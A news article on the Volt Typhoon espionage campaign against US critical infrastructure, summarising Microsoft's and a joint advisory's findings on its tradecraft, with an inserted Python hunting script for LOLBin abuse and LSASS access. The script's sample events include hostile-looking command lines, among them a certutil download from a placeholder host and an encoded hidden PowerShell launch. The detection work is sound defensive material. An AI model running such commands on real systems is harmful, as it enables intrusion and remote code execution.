According to Microsoft, the Chinese cyber espionage group it is tracking, dubbed Volt Typhoon, has been targeting critical infrastructure organizations across the US, including Guam, since at least mid-2021.
Its victims include a wide range of critical sectors such as government, shipping, telecommunications, manufacturing, IT, utilities, transportation, construction and education.
The initial attack vector is the compromise of internet-exposed Fortinet FortiGuard devices by exploiting an unknown zero-day vulnerability.
Once inside the target's network, the group carries out hands-on-keyboard activity using living-off-the-land binaries (LOLBins) such as PowerShell, Certutil, Netsh and the Windows Management Instrumentation Command Line (WMIC) to launch what Microsoft describes as "living-off-the-land" attacks.
However, according to a joint advisory released today by the FBI, NSA, CISA and the Australian, New Zealand, UK and Canadian cyber security agencies, Fast Reverse Proxy (frp), the Mimikatz credential theft tool, the Impacket networking framework and other open source tools have also been observed.
To avoid detection, Volt Typhoon blends its malicious activity with legitimate network traffic by routing it through hacked small office and home office (SOHO) network equipment, such as ASUS, Cisco, D-Link, Netgear, FatPipe and Zyxel routers, firewalls and VPN appliances.
Using the privileged access gained after a Fortinet device is compromised, the state hackers extract credentials from the Local Security Authority Subsystem Service (LSASS).
The stolen credentials allow them to deploy an Awen-based web shell to exfiltrate data and maintain persistence on the compromised systems.
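As an added illustration of how a defender might hunt for the tradecraft described above (example code written for this page, not from Microsoft, the advisory or the article), the following Python script scores constructed Sysmon-style events for suspicious LOLBin command lines, LOLBins spawned by a web server worker process (a web shell indicator) and non-system processes opening LSASS. The argument patterns, the web-worker list and the LSASS allow-list are assumptions to be tuned to a real environment's baseline.

```python
"""Detection sketch for living-off-the-land tradecraft: LOLBin command lines,
LOLBins spawned by a web server worker (web shell), and non-system processes
opening LSASS. Events mimic Sysmon fields (Event ID 1 = process creation,
Event ID 10 = process access). All sample events below are constructed."""
import re

# Heuristic argument patterns per LOLBin (assumption: tune to your own baseline).
SUSPICIOUS_ARGS = {
    "certutil.exe":   re.compile(r"-urlcache|-decode|-encode", re.I),
    "netsh.exe":      re.compile(r"portproxy", re.I),
    "wmic.exe":       re.compile(r"process\s+call\s+create|/node:", re.I),
    "powershell.exe": re.compile(r"-enc(odedcommand)?\b|downloadstring|\biex\b", re.I),
}
WEB_WORKERS = {"w3wp.exe", "httpd.exe"}  # parents that should never spawn LOLBins (assumption)
LSASS_READERS_OK = {r"c:\windows\system32\svchost.exe", r"c:\windows\system32\csrss.exe"}  # assumption

def image_name(path):
    """Lower-cased file name of a Windows image path ('' for an empty path)."""
    return path.rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the rule names one event triggers (empty list if none)."""
    hits = []
    if ev["event_id"] == 1:  # process creation
        img = image_name(ev["image"])
        pat = SUSPICIOUS_ARGS.get(img)
        if pat and pat.search(ev.get("cmdline", "")):
            hits.append(f"lolbin:{img}")
        if img in SUSPICIOUS_ARGS and image_name(ev.get("parent", "")) in WEB_WORKERS:
            hits.append(f"webshell-parent:{img}")
    elif ev["event_id"] == 10:  # process access; a real rule would also check the access mask
        if image_name(ev["target"]) == "lsass.exe" and ev["source"].lower() not in LSASS_READERS_OK:
            hits.append(f"lsass-access:{image_name(ev['source'])}")
    return hits

def hunt(events):
    """Return (event index, hits) for every event that triggered at least one rule."""
    return [(i, h) for i, ev in enumerate(events) if (h := score_event(ev))]

SAMPLE_EVENTS = [  # constructed sample data, not taken from the advisory
    {"event_id": 1, "image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.invalid/a.txt a.txt"},
    {"event_id": 1, "image": r"C:\Windows\System32\netsh.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "netsh interface portproxy add v4tov4 listenport=8443 connectport=443"},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"event_id": 1, "image": r"C:\Windows\System32\netsh.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "netsh wlan show profiles"},  # benign admin use, should not fire
    {"event_id": 10, "source": r"C:\Windows\System32\svchost.exe", "target": r"C:\Windows\System32\lsass.exe"},
    {"event_id": 10, "source": r"C:\Users\bob\Desktop\procdump64.exe", "target": r"C:\Windows\System32\lsass.exe"},
]

if __name__ == "__main__":
    for idx, hits in hunt(SAMPLE_EVENTS):
        print(idx, hits)
```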
According to Mandiant Intelligence chief analyst John Hultquist, these intrusions into US critical infrastructure organizations appear to be part of a concerted effort to give China access in the event of a future conflict between the two countries.
"There are many reasons for targeting critical infrastructure, but an unrelenting focus on these areas may indicate preparations for disruptive or destructive cyber attacks," said Hultquist.
"States conduct long-term incursions into critical infrastructure to prepare for potential conflicts. Similar contingency intrusions are regularly carried out by states.
Over the past decade, Russia has targeted several critical infrastructure sites in operations that were not intended for immediate effect. China has similarly targeted the oil and gas sector in the past. While these operations are aggressive and potentially dangerous, they do not necessarily indicate that an attack is imminent."
Microsoft said it followed its normal procedures and proactively contacted all customers targeted or compromised in these attacks, providing them with the information they needed to protect their networks from future breach attempts.